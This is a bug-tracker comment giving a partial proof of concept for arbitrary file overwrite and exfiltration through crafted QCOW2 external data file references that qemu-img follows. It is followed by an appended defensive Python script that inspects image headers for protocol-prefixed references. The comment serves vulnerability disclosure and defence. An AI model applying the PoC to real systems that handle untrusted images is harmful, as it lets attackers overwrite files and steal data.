Comment 44 for bug 2059809

Martin Kaesberger (mkaesberger) wrote (last edit): Re: Arbitrary file access through QCOW2 external data file

There is an obscure feature to embed QMP definitions for block devices into disk images. This does work for backing and data files in the QCOW2 format as well as for extents in VMDK. So here is a proof of concept that overwrites a local file:

# prepare two files with random content
truncate -s 1M file-1.raw && dd if=/dev/random of=file-1.raw bs=64 count=1 conv=notrunc
truncate -s 1M file-2.raw && dd if=/dev/random of=file-2.raw bs=64 count=1 conv=notrunc
# serve the second file read-write over NBD on TCP port 1234, under the export name "data"
qemu-nbd -p 1234 -f raw -x "data" -v -t -T 'nbd*' file-2.raw
# prepare the disk image
./qmp.sh
# ... and overwrite the first 112 bytes in file-1
qemu-img info disk.qcow2

Swap child1 and child2 to exfiltrate data or use the snapshot-access to deliver data to firewalled systems.
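As an added example that is not part of the comment above and not QEMU's own code: a small Python inspector that reads a QCOW2 header directly, pulls out the backing file name and the external data file name header extension (type 0x44415441, "DATA"), and flags any reference that uses the `json:` pseudo-protocol or another protocol prefix instead of a plain path. That is the check a host that imports untrusted images would want before handing the file to qemu-img or QEMU, which resolve such names as block drivers. The `json:{...nbd...}` string and the header fixture are constructed test input for the parser (the fixture is a header-only region, not a usable image); the host 127.0.0.1 is an assumption, the port and export name are taken from the qemu-nbd command in the PoC.

```python
"""Inspect the file references a QCOW2 header carries, without opening the image
through QEMU. Added example, not the qmp.sh script from the bug comment."""
import re
import struct
import sys

QCOW_MAGIC = b"QFI\xfb"
EXT_END = 0x00000000
EXT_BACKING_FORMAT = 0xE2792ACA
EXT_DATA_FILE = 0x44415441          # "DATA": external data file name extension
INCOMPAT_DATA_FILE = 1 << 2         # incompatible_features bit 2: external data file in use

# Fixed v3 header fields up to and including header_length (offset 100), big-endian.
HEADER_FMT = ">4sIQIIQIIQQIIQQQQII"
HEADER_V3_LEN = 112


def parse_qcow2_references(img: bytes) -> dict:
    """Return backing file name, backing format and external data file name from a
    QCOW2 header region, plus whether the external-data-file feature bit is set."""
    if len(img) < 72 or img[:4] != QCOW_MAGIC:
        raise ValueError("not a qcow2 image")
    version, backing_off, backing_len = struct.unpack(">IQI", img[4:20])
    refs = {"version": version, "backing_file": None, "backing_format": None,
            "data_file": None, "external_data_file_flag": False}
    if backing_off and backing_len:
        refs["backing_file"] = img[backing_off:backing_off + backing_len].decode("utf-8", "replace")
    if version >= 3:
        incompat, = struct.unpack(">Q", img[72:80])
        header_len, = struct.unpack(">I", img[100:104])
    else:
        incompat, header_len = 0, 72   # v2: no feature bits; extensions start right after the header
    refs["external_data_file_flag"] = bool(incompat & INCOMPAT_DATA_FILE)
    pos = header_len
    while pos + 8 <= len(img):
        ext_type, ext_len = struct.unpack(">II", img[pos:pos + 8])
        if ext_type == EXT_END:
            break
        data = img[pos + 8:pos + 8 + ext_len]
        if ext_type == EXT_DATA_FILE:
            refs["data_file"] = data.decode("utf-8", "replace")
        elif ext_type == EXT_BACKING_FORMAT:
            refs["backing_format"] = data.decode("utf-8", "replace")
        pos += 8 + ((ext_len + 7) & ~7)  # extension payload is padded to a multiple of 8
    return refs


def has_protocol_prefix(name: str) -> bool:
    """True for 'json:{...}' and 'scheme://...' style names, which QEMU hands to a block
    driver instead of treating them as a path. A single-letter scheme is left alone so
    Windows drive letters ('C:\\...') do not trigger."""
    m = re.match(r"^([A-Za-z][A-Za-z0-9+.-]*):", name)
    return bool(m) and len(m.group(1)) > 1


def suspicious_references(refs: dict) -> list:
    """List the (field, value) pairs that point somewhere other than a plain file path."""
    return [(field, refs[field]) for field in ("backing_file", "data_file")
            if refs[field] is not None and has_protocol_prefix(refs[field])]


def build_header_fixture(data_file: str = "", backing_file: str = "") -> bytes:
    """Constructed test input: a 4 KiB QCOW2 v3 header region (header, extensions,
    backing name). No L1/refcount tables are written, so this is not a usable image."""
    exts = b""
    if data_file:
        d = data_file.encode()
        exts += struct.pack(">II", EXT_DATA_FILE, len(d)) + d + b"\0" * (-len(d) % 8)
    exts += struct.pack(">II", EXT_END, 0)
    backing = backing_file.encode()
    backing_off = HEADER_V3_LEN + len(exts) if backing else 0
    incompat = INCOMPAT_DATA_FILE if data_file else 0
    hdr = struct.pack(HEADER_FMT, QCOW_MAGIC, 3, backing_off, len(backing),
                      12, 1 << 20,             # cluster_bits (4 KiB), virtual size
                      0, 0, 0, 0, 0, 0, 0,     # crypt, l1_size, l1/refcount/snapshot offsets and counts
                      incompat, 0, 0,          # incompatible / compatible / autoclear features
                      4, HEADER_V3_LEN)        # refcount_order, header_length
    hdr += b"\0" * 8                           # compression_type plus padding up to 112 bytes
    img = hdr + exts + backing
    return img + b"\0" * (4096 - len(img))


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as fh:
        header_region = fh.read(1 << 20)   # header, extensions and backing name sit at the front
    found = parse_qcow2_references(header_region)
    for field, value in suspicious_references(found):
        print(f"WARNING: {field} is not a plain path: {value}")
    print(found)
```

Run it as `python qcow2_refs.py disk.qcow2` before the image is ever passed to qemu-img; the PoC above shows that `qemu-img info` already follows the data file reference, so the check has to read the header bytes itself rather than ask QEMU.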